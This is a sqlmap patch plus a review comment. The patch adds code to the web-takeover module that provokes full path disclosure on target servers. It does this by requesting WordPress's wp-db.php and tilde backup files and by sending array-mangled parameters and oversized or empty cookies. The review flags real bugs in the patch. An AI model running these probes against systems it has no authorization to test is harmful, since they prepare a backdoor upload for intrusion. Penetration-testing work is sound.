From cfe34f61b8dded73d228cfb5830edb118ea78a4f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 6 Apr 2017 11:33:59 +0200
Subject: [PATCH] Implementation for an Issue #1895
---
 lib/core/settings.py | 2 +-
 lib/takeover/web.py | 57 ++++++++++++++++++++++++++++++++++++++++++++
 txt/checksum.md5 | 4 ++--
 3 files changed, 60 insertions(+), 3 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 7323fbe9a..54fb3b4d1 100755
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.1.3.19"
+VERSION = "1.1.4.0"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 5f5526068..8af9ffbdf 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -26,6 +26,7 @@ from lib.core.common import ntToPosixSlashes
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import isWindowsDriveLetterPath
 from lib.core.common import normalizePath
+from lib.core.common import parseFilePaths
 from lib.core.common import posixToNtSlashes
 from lib.core.common import randomInt
 from lib.core.common import randomStr
@@ -38,8 +39,10 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import DBMS
+from lib.core.enums import HTTP_HEADER
 from lib.core.enums import OS
 from lib.core.enums import PAYLOAD
+from lib.core.enums import PLACE
 from lib.core.enums import WEB_API
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
@@ -196,6 +199,60 @@ class Web:
 self.webApi = choices[int(choice) - 1]
 break
+ if not kb.absFilePaths:
+ message = "do you want sqlmap to further try to "
+ message += "provoke the full path disclosure? [Y/n] "
+ getOutput = readInput(message, default="Y")
+
+ if getOutput in ("y", "Y"):
+ headers = {}
+ been = {conf.url}
+
+ for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I):
+ url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
+ if url not in been:
+ try:
+ page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
+ parseFilePaths(page)
+ except:
+ pass
+ finally:
+ been.add(url)
+
+ url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url)
+ if url not in been:
+ try:
+ page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
+ parseFilePaths(page)
+ except:
+ pass
+ finally:
+ been.add(url)
+
+ for place in (PLACE.GET, PLACE.POST):
+ if place in conf.parameters:
+ value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
+ if "[]" in value:
+ page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
+ parseFilePaths(page)
+
+ cookie = None
+ if PLACE.COOKIE in conf.parameters:
+ cookie = conf.parameters[PLACE.COOKIE]
+ elif headers and HTTP_HEADER.SET_COOKIE in headers:
+ cookie = headers[HTTP_HEADER.SET_COOKIE]
+
+ if cookie:
+ value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
+ if value != cookie:
+ page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
+ parseFilePaths(page)
+
+ value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
+ if value != cookie:
+ page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
+ parseFilePaths(page)
+
 directories = list(arrayizeValue(getManualDirectories()))
 directories.extend(getAutoDirectories())
 directories = list(oset(directories))
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 138c5074a..1a550e810 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -45,7 +45,7 @@ a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py d8e9250f3775119df07e9070eddccd16 lib/core/replication.py 785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py 40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py -17a78d5c8c8135e2d8b45f7ac4319618 lib/core/settings.py +50edc9861e7441371210f5fae263207c lib/core/settings.py d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py 2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py afd0636d2e93c23f4f0a5c9b6023ea17 lib/core/target.py
@@ -84,7 +84,7 @@ c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py 4cd0322f22fbc26284cffa9f8f7545ef lib/takeover/udf.py -a610e0ef2fb8512604c2b6c081174850 lib/takeover/web.py +ab021269ad7f4d552025448ae08c51d0 lib/takeover/web.py e5a82481947e798d0c11f3acf3e9db60 lib/takeover/xp_cmdshell.py cae752650755c706272a45ae84519a4b lib/techniques/blind/inference.py 310efc965c862cfbd7b0da5150a5ad36 lib/techniques/blind/__init__.py
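Review bot: The three `re.sub` calls that rewrite the GET/POST and cookie parameters in the full-path-disclosure block drop the separator they match, because group 1 (`\A|&` / `\A|;`) is never re-emitted in the replacement: `a=1&b=2` becomes `a[]=1b[]=2` and `a=1;b=2` becomes `a=AAA…b=AAA…`, so every parameter after the first is folded into the first one's value and the probe request no longer resembles the original. Unless that merge is intended, the replacements should be `r"\g<1>\g<2>[]="`, `r"\g<1>\g<2>=AAAA…"` and `r"\g<1>\g<2>="` (raw strings also avoid the non-raw `"\g<2>"` escape used here). Separately, the two bare `except:` around `Request.getPage` swallow everything including `KeyboardInterrupt`, so Ctrl-C during these extra probes is silently ignored — `except Exception:` (or the project's connection exception) keeps the best-effort intent without eating user interrupts. `conf.url.replace(conf.path, match.group(4))` also substitutes every occurrence of `conf.path` in the URL, which corrupts the scheme/host part when the path is `/` or repeats elsewhere in the URL; rebuilding the URL from its split components would be safer. The enclosing method starts before this hunk.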